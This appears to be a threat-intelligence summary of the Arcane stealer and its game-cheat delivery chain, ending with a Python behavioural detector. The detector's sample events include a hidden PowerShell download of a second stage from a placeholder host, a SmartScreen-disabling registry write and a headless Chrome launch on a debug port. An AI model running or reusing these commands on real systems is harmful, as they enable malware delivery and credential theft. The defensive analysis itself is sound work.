Full Report
YouTube videos promoting game cheats are being used to deliver a previously undocumented stealer malware called Arcane, likely targeting Russian-speaking users. "What's intriguing about this malware is how much it collects," Kaspersky said in an analysis. "It grabs account information from VPN and gaming clients, and all kinds of network utilities like ngrok, Playit, Cyberduck, FileZilla, and
Analysis Summary
# Tool/Technique: Arcane Stealer
## Overview
Arcane is a previously undocumented stealer malware primarily distributed through YouTube videos promoting game cheats. It is designed to harvest a wide variety of sensitive data, including credentials, cryptocurrency wallet information, and system configuration files, targeting Russian-speaking users, specifically in Russia, Belarus, and Kazakhstan.
## Technical Details
- Type: Malware family (Infostealer)
- Platform: Windows (Implied by use of DPAPI, PowerShell, and Windows SmartScreen)
- Capabilities: Credential theft, cryptocurrency wallet harvesting, system and network utility configuration exfiltration, process enumeration, screenshot capture.
- First Seen: November 2024 (when Arcane was first observed replacing VGS as the primary payload; VGS had been active before that).
## MITRE ATT&CK Mapping
*Note: Since Arcane is newly documented, the techniques below are inferred from the described behavior rather than confirmed.*
- **TA0003 - Persistence** (not confirmed; would depend on the initial execution mechanisms)
  - **T1547 - Boot or Logon Autostart Execution** (only if a persistence mechanism is implemented)
- **TA0005 - Defense Evasion**
  - **T1218 - Signed Binary Proxy Execution** (potential, given the use of legitimate tools such as PowerShell)
- **TA0009 - Collection**
  - **T1005 - Data from Local System** (harvesting system data and configuration files)
  - **T1555 - Credentials from Password Stores** (stealing browser, VPN, and crypto wallet credentials)
- **TA0010 - Exfiltration** (implied; no channel is described)
## Functionality
### Core Capabilities
* **Data Collection:** Harvests login credentials, passwords, cookies from Chromium- and Gecko-based browsers.
* **Application Credential Theft:** Specifically targets account information from numerous applications, including VPN clients (OpenVPN, NordVPN, etc.), network utilities (ngrok, FileZilla), messaging apps (Discord, Telegram), email clients (Outlook), gaming clients (Steam, Epic), and crypto wallets (Exodus, Electrum, Zcash).
* **System Information Gathering:** Enumerates running processes and lists saved Wi-Fi networks and their associated passwords.
* **Screenshot Capture:** Takes screenshots of the infected device.
* **DPAPI Usage:** Employs the Data Protection API (DPAPI) to obtain the browser encryption keys needed to decrypt stored sensitive data, a technique typical of stealers.
### Advanced Features
* **Xaitax Utility Integration:** Bundles the Xaitax utility and runs it covertly, parsing its console output to recover browser keys; this serves as an alternative or supplemental key-extraction method alongside DPAPI.
* **Debug Port Cookie Extraction:** Implements a separate method for extracting cookies from Chromium-based browsers by launching a copy of the browser through a debug port.
* **Payload Chain:** Initial execution involves a password-protected archive unpacked via a `start.bat` batch file, which retrieves a second archive via PowerShell. This batch file disables Windows SmartScreen protections and adds all drive root folders to SmartScreen filter exceptions.
## Indicators of Compromise
- File Hashes: [Not explicitly provided in the article snippet]
- File Names: `start.bat`; executables embedded in the downloaded archive (one crypto miner, one stealer).
- Registry Keys: [Not explicitly provided in the article snippet]
- Network Indicators: [Not explicitly provided in the article snippet, C2 information is missing]
- Behavioral Indicators:
  * Execution of a batch file (`start.bat`) initiating PowerShell commands.
  * Disabling Windows SmartScreen protections via configuration changes.
  * PowerShell retrieving additional archives over the network.
  * Execution of the Xaitax utility.
  * Launching browser instances via debug ports.
## Associated Threat Actors
* Unidentified threat actors.
* The campaign appears to be focused on Russian-speaking regions (Russia, Belarus, Kazakhstan).
## Detection Methods
- Signature-based detection: [Not explicitly provided; signatures would target the known binaries/file hashes once obtained.]
- Behavioral detection: Monitoring for unusual execution chains involving batch files launching PowerShell to retrieve secondary payloads, disabling of SmartScreen, and execution of legitimate tools like Xaitax for decryption.
- YARA rules: [Not explicitly provided]
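The behavioral detection described above, worked through as an added example (this is not code from the article or from Kaspersky). It runs three rules over Sysmon-style process-creation (Event ID 1) and registry-set (Event ID 13) records: a `.bat` run by `cmd.exe` spawning PowerShell with a download primitive, a SmartScreen control value being written to an "off" state, and a Chromium browser launched with its remote debugging port enabled. Assumptions, stated in the comments too: the two SmartScreen registry values and the `--remote-debugging-port` switch are real Windows/Chromium settings, but the article does not say Arcane uses exactly these; the PowerShell cmdlet list is a generic choice; all sample events and the `example.invalid` URL are constructed.

```python
"""Toy behavioural detection for the Arcane delivery chain.

Events are Sysmon-style records already parsed into dicts:
event_id 1 = process creation, event_id 13 = registry value set.
Every sample event below is constructed for this example.
"""
import re

# Registry values that govern SmartScreen. The locations are real; that
# Arcane edits exactly these is an assumption (the article only says the
# batch file disables SmartScreen through configuration changes).
SMARTSCREEN_VALUES = (
    r"software\microsoft\windows\currentversion\explorer\smartscreenenabled",
    r"software\policies\microsoft\windows\system\enablesmartscreen",
)
# Sysmon renders REG_SZ "Off" as-is and a DWORD 0 as "DWORD (0x00000000)".
SMARTSCREEN_OFF = {"off", "dword (0x00000000)"}

# Generic PowerShell download primitives a batch-driven dropper may use (assumption).
DOWNLOAD_PATTERN = re.compile(
    r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer|\bcurl\b",
    re.IGNORECASE,
)

# Chromium-based browsers; --remote-debugging-port is Chromium's real switch for
# the debug interface. That Arcane uses this exact switch is an assumption.
CHROMIUM_BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe", "vivaldi.exe"}
DEBUG_PORT_SWITCH = "--remote-debugging-port"


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rule_batch_to_powershell_download(ev: dict) -> bool:
    """cmd.exe running a .bat spawns PowerShell that fetches something (start.bat stage)."""
    if ev.get("event_id") != 1 or _basename(ev.get("image", "")) not in {"powershell.exe", "pwsh.exe"}:
        return False
    parent_is_batch = (_basename(ev.get("parent_image", "")) == "cmd.exe"
                       and ".bat" in ev.get("parent_cmdline", "").lower())
    return parent_is_batch and DOWNLOAD_PATTERN.search(ev.get("cmdline", "")) is not None


def rule_smartscreen_disabled(ev: dict) -> bool:
    """A SmartScreen control value is written with an 'off' setting."""
    if ev.get("event_id") != 13:
        return False
    target = ev.get("target", "").lower()
    if not any(v in target for v in SMARTSCREEN_VALUES):
        return False
    return ev.get("details", "").strip().lower() in SMARTSCREEN_OFF


def rule_browser_debug_port(ev: dict) -> bool:
    """A Chromium browser is started with its remote debugging port enabled."""
    if ev.get("event_id") != 1:
        return False
    return (_basename(ev.get("image", "")) in CHROMIUM_BROWSERS
            and DEBUG_PORT_SWITCH in ev.get("cmdline", "").lower())


RULES = {
    "batch_to_powershell_download": rule_batch_to_powershell_download,
    "smartscreen_disabled": rule_smartscreen_disabled,
    "browser_debug_port": rule_browser_debug_port,
}


def detect(events: list) -> list:
    """Return (event index, rule name) pairs for every event a rule matches."""
    return [(idx, name) for idx, ev in enumerate(events)
            for name, rule in RULES.items() if rule(ev)]


# Constructed sample telemetry: one Arcane-like chain plus benign noise.
SAMPLE_EVENTS = [
    {"event_id": 1, "image": r"C:\Windows\System32\cmd.exe", "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'cmd.exe /c "C:\Users\u\Downloads\cheat\start.bat"'},
    {"event_id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "parent_cmdline": r'cmd.exe /c "C:\Users\u\Downloads\cheat\start.bat"',
     "cmdline": "powershell -w hidden -c \"Invoke-WebRequest -Uri http://stage2.example.invalid/s.rar -OutFile $env:TEMP\\s.rar\""},
    {"event_id": 13, "target": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SmartScreenEnabled",
     "details": "Off"},
    {"event_id": 13, "target": r"HKLM\SOFTWARE\Policies\Microsoft\Windows\System\EnableSmartScreen",
     "details": "DWORD (0x00000001)"},  # SmartScreen turned on: not a hit
    {"event_id": 1, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "parent_image": r"C:\Users\u\AppData\Local\Temp\stealer.exe",
     "cmdline": r'"chrome.exe" --headless --remote-debugging-port=9222 --user-data-dir="C:\Users\u\AppData\Local\Google\Chrome\User Data"'},
    {"event_id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "powershell -c Get-Process"},  # interactive use: not a hit
]

if __name__ == "__main__":
    for idx, name in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
```

Each rule is deliberately narrow on its own; the value comes from correlating them on one host within a short window, since a SmartScreen change followed by a headless browser on a debug port is a much stronger signal than either event alone.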
## Mitigation Strategies
* **User Education:** Caution users against downloading or executing files from suspicious sources, particularly game cheats found via YouTube videos.
* **Endpoint Protection:** Ensure Windows SmartScreen is enabled and maintained (do not allow exceptions for root drive folders).
* **Application Control:** Implement controls to restrict the execution of potentially malicious binaries delivered via unexpected methods.
* **Network Monitoring:** Monitor for unusual PowerShell activity downloading secondary payloads from untrusted sources.
## Related Tools/Techniques
* **VGS Stealer:** The predecessor malware that Arcane replaced in the attack chain; noted as a variant of the Phemedrone Stealer malware.
* **ArcanaLoader:** A related loader tool introduced by the same actors, ostensibly for delivering game cheats but ultimately delivering the stealer malware.
* **Phemedrone Stealer:** The base family from which VGS (and potentially Arcane, given the evolutionary link) derives capabilities.